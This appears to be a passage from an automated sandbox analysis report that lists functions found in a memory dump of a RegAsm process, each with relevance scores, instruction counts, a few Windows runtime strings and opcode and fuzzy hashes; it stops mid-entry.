                                                              • Opcode Fuzzy Hash: 3f92f7e0872c713ff4f8a9363af3336b86078a6e39b28e1c5de863e903c9aab6
                                                              • Instruction Fuzzy Hash: B851CF72A047469FC725EF64C4407A7B7E4AF84344F00483FEAAA87240EB74D545CF92
                                                              Function 02F3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 02F3A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 02F3A2FB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: c3cd3b03de78f76e78474b72e7e43cbddf209ffa159984ef88240eade577d355
                                                              • Instruction ID: 3de49321b9b6cddf1d851b218a015bfa5862d7d1fbade71d0bd545344d7ff3ba
                                                              • Opcode Fuzzy Hash: c3cd3b03de78f76e78474b72e7e43cbddf209ffa159984ef88240eade577d355
                                                              • Instruction Fuzzy Hash: 0C41AC31E04649DBDB12CF6AC880BAA77F5FF84784F2440A9EA45DB2A1E776D900CB50
                                                              Function 02F6A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 22b574f49e61e00595e1823c06b7c724d9dc05c517374b5850b6010d8e013beb
                                                              • Instruction ID: 9ce0cdcf424b18303d6bfddaf3fda3260d4c7021745f5bf2385ce2ef6d6c41e6
                                                              • Opcode Fuzzy Hash: 22b574f49e61e00595e1823c06b7c724d9dc05c517374b5850b6010d8e013beb
                                                              • Instruction Fuzzy Hash: CE01DCB2640744AFE321DF24CD49B2677E8E744B59F00893AA658D7290E7B5E804DF46
                                                              Function 02F3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: c1a81a5e1fcab61c71b31dde98a13e656962cb0a90115389de52542746f846d1
                                                              • Instruction ID: 450f8f6befe6159c156fc4bfebfb5c7093b103eac9b7398ed27b17ab4f3c541f
                                                              • Opcode Fuzzy Hash: c1a81a5e1fcab61c71b31dde98a13e656962cb0a90115389de52542746f846d1
                                                              • Instruction Fuzzy Hash: CE824B75E002188BDB26CFA9C980BEDB7B5BF48794F14816AEA59BB250D7309D81CF50
                                                              Function 02FB6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 9be9abc975270a55f771d4310a2a8590a9a27d050abec68956a2547207419487
                                                              • Instruction ID: 83590f13dd8b177cd4fc1ab354ad06a49b090a7195b2f39d8ea27c6c72aaf512
                                                              • Opcode Fuzzy Hash: 9be9abc975270a55f771d4310a2a8590a9a27d050abec68956a2547207419487
                                                              • Instruction Fuzzy Hash: 9F914F72A41619ABDB21DBA5DD85FEEBBB9EF04794F100065F701AB290D774A900CFA0
                                                              Function 02FDE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 6f85808524359c260964e4ad7e48123a25a48dd3abd000cbe7d437121fb754bc
                                                              • Instruction ID: 919982ae8d947e9f625d048b72528ff40b7b62a70956964c559e9cb9b2d0030b
                                                              • Opcode Fuzzy Hash: 6f85808524359c260964e4ad7e48123a25a48dd3abd000cbe7d437121fb754bc
                                                              • Instruction Fuzzy Hash: 8E918032E00549ABDB26ABA4DC84FAFBBBBEF457D4F140019F701AB250DB749941CB90
                                                              Function 02F6A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 8588853b3b94b8e8213b5982284917a4c5e4ca29e150571b373346def54ef809
                                                              • Instruction ID: 8b8c3628c2668735d016f7e4bd4895bacd36ca8fd53dba921cfc659af3c88ea6
                                                              • Opcode Fuzzy Hash: 8588853b3b94b8e8213b5982284917a4c5e4ca29e150571b373346def54ef809
                                                              • Instruction Fuzzy Hash: 1A7161B5E0021ACFDF24DF98D5A0AADB7BAFF48784F188129EA05E7240DB719941CF50
                                                              Function 02F4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: e6e88ef7eca561315b4c1c1def441fc722e61db1619917ecf315f3f9236eb6a9
                                                              • Instruction ID: c2efc40024ced83c203ddd773604ce4ce5fa49eaac96da8892ab55ef6ec75961
                                                              • Opcode Fuzzy Hash: e6e88ef7eca561315b4c1c1def441fc722e61db1619917ecf315f3f9236eb6a9
                                                              • Instruction Fuzzy Hash: 904182729083159BD710DB748880F6BBBD9BF88798F44092DFB94D7180EBB4D904CB96
                                                              Function 02FAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: c840b0c9d539f48a12cb333359c98bcdd4d0b57a7aedb7bf2ed4b9df5aa907e0
                                                              • Instruction ID: 95fad5693dbc874ecc60ab058b887ef7536867d218a953289f1aeb8fda38496e
                                                              • Opcode Fuzzy Hash: c840b0c9d539f48a12cb333359c98bcdd4d0b57a7aedb7bf2ed4b9df5aa907e0
                                                              • Instruction Fuzzy Hash: A54122F1D0112CAADB21DA60CC94FDEB77DBB45794F0045E6EB08AB140DB709E898FA4
                                                              Function 02FD2000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b42795239450c003037d3486b77419d1d3753a6f4004812dd9d1a1bad77ede93
                                                              • Instruction ID: 6b756bc57ef6468c881c489d4e21d3b8ad9c9d7063ae78cd9b5c10b8347974dd
                                                              • Opcode Fuzzy Hash: b42795239450c003037d3486b77419d1d3753a6f4004812dd9d1a1bad77ede93
                                                              • Instruction Fuzzy Hash: D942B132A083419BD725DF64C890B6BB7E6AF88384F4C492EFF8197252D771D845CB92
                                                              Function 02FC8158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 025570540f4f3195e48e4ae996cfc3a4b6436dd5e668fdf7adbd5f4674421b58
                                                              • Instruction ID: ab7b839be20f5a6edec12c636f57191dce87e131c66314f9533cd8aafa4a86c4
                                                              • Opcode Fuzzy Hash: 025570540f4f3195e48e4ae996cfc3a4b6436dd5e668fdf7adbd5f4674421b58
                                                              • Instruction Fuzzy Hash: 4A425B71E002199FDB25CF69C981BADB7F6BF88384F24809DEA49AB241D7349D85CF50
                                                              Function 02FDA118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e808f3fce4b7e7b945f46df8f4fbd23cb2581751c299dd13eae2331a65345e7
                                                              • Instruction ID: f4f77659cbbde30f3ba2e6f31d1c060d8cc317a8a732549a029dd5185dbea64d
                                                              • Opcode Fuzzy Hash: 7e808f3fce4b7e7b945f46df8f4fbd23cb2581751c299dd13eae2331a65345e7
                                                              • Instruction Fuzzy Hash: 5D220275A04651CFDB25CF29C090372B7F3AF45384F1C849ADA968F286E735E452CB68
                                                              Function 02F365D0 Relevance: .4, Instructions: 383COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb1f32e6047699185065b66977e53bafad9536bed23d516e00db20d2d7e8d13a
                                                              • Instruction ID: 437797748234de9d20b097259dbd0ea5c8fb8746b954d526bb081600506321f6
                                                              • Opcode Fuzzy Hash: bb1f32e6047699185065b66977e53bafad9536bed23d516e00db20d2d7e8d13a
                                                              • Instruction Fuzzy Hash: 39E19B71A09341DFC715CF28C490A2ABBE5FF88384F04896DEA998B351DB31E905CF96
                                                              Function 02F28397 Relevance: .4, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5591891ae39daf8e76366da42411dca96cb81c5e4572053d0919ac9916a8271
                                                              • Instruction ID: cea44e99cc51bf21a8a0ccee98908805f64f0dc548213d1ed02387ff4d6b36e8
                                                              • Opcode Fuzzy Hash: b5591891ae39daf8e76366da42411dca96cb81c5e4572053d0919ac9916a8271
                                                              • Instruction Fuzzy Hash: 43D1C572A0022A9BCB14DF64CC91FBAB7E5BF453D8F044669EB15DB280E734D949CB60
                                                              Function 02FB8243 Relevance: .3, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: e76c8c06d08e1de4bafcd85cf7afbe6c08cd6c6c81e4160256eeab91e33db991
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: ABB13C75F00604AFDB26DB96C940AEBB7BEAF843C4F144469AA42A7790DB34ED45CB10
                                                              Function 02F40535 Relevance: .3, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: f5240649c73e62cf736ce52c46147fd600ce84eeb10a0eddef113a2f3231566e
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: A6B1C331B00646AFDF25DB64C850BBEBBB6AF44384F144199D75297391DF70E941CB50
                                                              Function 02F383C0 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dab4cb9d0c1f3ddd4de0393831396b8833989777eefdb2fc488cb7de05b575a8
                                                              • Instruction ID: e68afa227eba0b99ab23e88d9d610e09cddae24fbf26438f86062230b3c704a1
                                                              • Opcode Fuzzy Hash: dab4cb9d0c1f3ddd4de0393831396b8833989777eefdb2fc488cb7de05b575a8
                                                              • Instruction Fuzzy Hash: 66C139756083418FEB64CF15C494BABB7E5BF88384F44496DEA8987390D778E908CF92
                                                              Function 02F2C427 Relevance: .3, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eed3104364d22b84ec625f86aba6c253c4bdcd23a952dfe81e77accda398d67e
                                                              • Instruction ID: ff6b3d117d9744d23e80d13199814a8b9654f97578c43bbd97b7a1bfde14f8d4
                                                              • Opcode Fuzzy Hash: eed3104364d22b84ec625f86aba6c253c4bdcd23a952dfe81e77accda398d67e
                                                              • Instruction Fuzzy Hash: 9DB18370A002658BDB24DF54C890BADB3B6EF45784F0185EAD60AE7340DB74DD89CF21
                                                              Function 02F5E5E7 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91031c1134babb820a07603ddaeeb3582147e3c32debb7fce6d4077aadc641db
                                                              • Instruction ID: c0856cfa60b5a0800f0a919f7b485e88e2ae26a0780be29956bb7cf554e4a9e6
                                                              • Opcode Fuzzy Hash: 91031c1134babb820a07603ddaeeb3582147e3c32debb7fce6d4077aadc641db
                                                              • Instruction Fuzzy Hash: 69A13431E00268AFEF21DF58C844BAEBBA5AF007D4F140261EF10AB691D7789E40CF91
                                                              Function 02F70185 Relevance: .3, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 462436fe294ddac78265a3afc9f353933824e65fcc994e87c62bfd1db2177468
                                                              • Instruction ID: d20435a2c233acc39076e663ebe9cd5fde847c8f7c4214497e3176bb9808bbb1
                                                              • Opcode Fuzzy Hash: 462436fe294ddac78265a3afc9f353933824e65fcc994e87c62bfd1db2177468
                                                              • Instruction Fuzzy Hash: A3A19EB1B0161A9BDB24DF69C990BAAB7F1FF54398F10403EEB0597281DB74E811CB90
                                                              Function 03004500 Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30a6ad1a9e3fbf0acec19944cb37eb4ea399e27c98de1086f3e4725200006ef0
                                                              • Instruction ID: 1c01087a7abf94a6a3c1afe840d4760651f0145e1282c53e7635f1742f871563
                                                              • Opcode Fuzzy Hash: 30a6ad1a9e3fbf0acec19944cb37eb4ea399e27c98de1086f3e4725200006ef0
                                                              • Instruction Fuzzy Hash: 28A1FE72A02611AFD721DF19CD80B1ABBEAFF48344F540968F6499B690C774ED00CF95
                                                              Function 02FB60E0 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e22967d1acd3fe3d4f9fd50a2559205f650520fcaab21472e9b886faf6660119
                                                              • Instruction ID: fa643c086100560c51a55f366103cb48316bdd4744ad998af3d3e215475b9d51
                                                              • Opcode Fuzzy Hash: e22967d1acd3fe3d4f9fd50a2559205f650520fcaab21472e9b886faf6660119
                                                              • Instruction Fuzzy Hash: F8918171E00215AFDF16DF69DC84BAEBBB9AF48784F154169E711EB380D734D9008BA0
                                                              Function 02F4E3F0 Relevance: .3, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2abf9be42caba5661a5d9ef519769db7cb3e163d5b5495710cad1b60d2176c1d
                                                              • Instruction ID: d258e786b208ffbce147f844f092e42d824c63586e9f5ebf7bcc468dc63cacef
                                                              • Opcode Fuzzy Hash: 2abf9be42caba5661a5d9ef519769db7cb3e163d5b5495710cad1b60d2176c1d
                                                              • Instruction Fuzzy Hash: D6910336E006158BEB24DB19C944B7DBBA2FF84794F064069EB05DB390EFB8D941CB91
                                                              Function 02F6E284 Relevance: .2, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cde15c23e531d355f7002a8cfd9a7cbd7ca9036a0f08e576f86a0a059017e77a
                                                              • Instruction ID: a0420b502b1ae881c74ba0c7debbbba23ed3ccf213bf9e36a0c568af1e288f27
                                                              • Opcode Fuzzy Hash: cde15c23e531d355f7002a8cfd9a7cbd7ca9036a0f08e576f86a0a059017e77a
                                                              • Instruction Fuzzy Hash: 77818176A00609AFDB21CFA5C885FEEBBFAFF48384F144429E655A7250D770AC05CB60
                                                              Function 02F4C640 Relevance: .2, Instructions: 206COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f0f0777d1cb729aba78635dc27eb230d68fc830dc624e739a63c5fd62a87b61
                                                              • Instruction ID: 3df7ae987e7b09cbd52f235e9475a8f10cb09793f6b8946fb5aa88b059cf9d29
                                                              • Opcode Fuzzy Hash: 8f0f0777d1cb729aba78635dc27eb230d68fc830dc624e739a63c5fd62a87b61
                                                              • Instruction Fuzzy Hash: 8E71E175D02269DBDB25CF59C890BBEBBB5FF59780F14411BEA42AB350DB749800CBA0
                                                              Function 02FE47A0 Relevance: .2, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cbd7ef2dd4b63a41cada88ae856a4d8b9775f4da2d7dd0f40c81223636a5fe5
                                                              • Instruction ID: 320b5a748aeeb7d62a025ce432eba0e2c5e9e2afd4d20978bf4c42e958a9fe2f
                                                              • Opcode Fuzzy Hash: 4cbd7ef2dd4b63a41cada88ae856a4d8b9775f4da2d7dd0f40c81223636a5fe5
                                                              • Instruction Fuzzy Hash: 00717070D01208DFCF21EF95D940A5ABBF9EB91794F20415EE712A7298C7BA9900DF54
                                                              Function 02F4260B Relevance: .2, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad9740dd002c15cd9892a9f97a489b56f98491b13fc5c459f4b55fa2fac76857
                                                              • Instruction ID: 17cf40b32af4e3689aa94cae4b49a74a7a9b10cd807bbc99207536a3695d0cc2
                                                              • Opcode Fuzzy Hash: ad9740dd002c15cd9892a9f97a489b56f98491b13fc5c459f4b55fa2fac76857
                                                              • Instruction Fuzzy Hash: 42719C71A046418FD711DF28C880B2ABBE6FF84394F0485AAFA99CB751DBB4DC45CB91
                                                              Function 02FC62A0 Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1c33f1540676e7383635f03c8a085b80dc56531180aca0e4f188a4222807ea0
                                                              • Instruction ID: 1f82dbfa2ef4aaec118d3df85718f528dc6c0bb4d4125c03cbdd231054a508c5
                                                              • Opcode Fuzzy Hash: a1c33f1540676e7383635f03c8a085b80dc56531180aca0e4f188a4222807ea0
                                                              • Instruction Fuzzy Hash: E671E032604602AFD7319F14CE44F66B7AAEF847A4F24442CE756D72A0DB75E944CB50
                                                              Function 02FB035C Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction ID: 5e00b13767b58bc1cb09607ae888c4cb4423783b05b3490f6e3a8136496d4f37
                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction Fuzzy Hash: 4F716A71E00609AFCB11DFA9CD84AEEBBB9FF48784F104569E605A7250DB34EA41CF90
                                                              Function 03008324 Relevance: .2, Instructions: 192COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b6a0aa8954dc369f84257856887fd8c09e4e24fdbdae64ada36ac3c3a3f4034
                                                              • Instruction ID: e01ef58381c2cd4624a01f10ce6d2508cc174791db24441b8d3fac42af49cd65
                                                              • Opcode Fuzzy Hash: 4b6a0aa8954dc369f84257856887fd8c09e4e24fdbdae64ada36ac3c3a3f4034
                                                              • Instruction Fuzzy Hash: 4F713C71E01609AFEB15DF94CC81FEEBBB9FB04350F104169EA15A7290D774AA05CF90
                                                              Function 02FEA250 Relevance: .2, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d9295bda409f992b9687e837dce665db68a1ebe3ec915b46ee6a92797d07301
                                                              • Instruction ID: 56ca905098b3779396dee732eb70d86d19e762fe131b5de3137b4c65752d64d1
                                                              • Opcode Fuzzy Hash: 9d9295bda409f992b9687e837dce665db68a1ebe3ec915b46ee6a92797d07301
                                                              • Instruction Fuzzy Hash: 0C51D172904711AFDB12DE68C984E5BB7E9EFC4794F010929BB42DB260D771ED04CBA2
                                                              Function 02FD8350 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d61689fb9b2ecd632b8735fe827dd85cbe484d74b344c126f34f37d858b7f48
                                                              • Instruction ID: 04c3299ce2f23943f6e218bce47f521de94d07c377da3038a8308544c522b823
                                                              • Opcode Fuzzy Hash: 0d61689fb9b2ecd632b8735fe827dd85cbe484d74b344c126f34f37d858b7f48
                                                              • Instruction Fuzzy Hash: B451BE70900704DFD720DF66C980BABFBFABF45794F14461ED296976A0C7B0A942CB50
                                                              Function 02F6E443 Relevance: .2, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
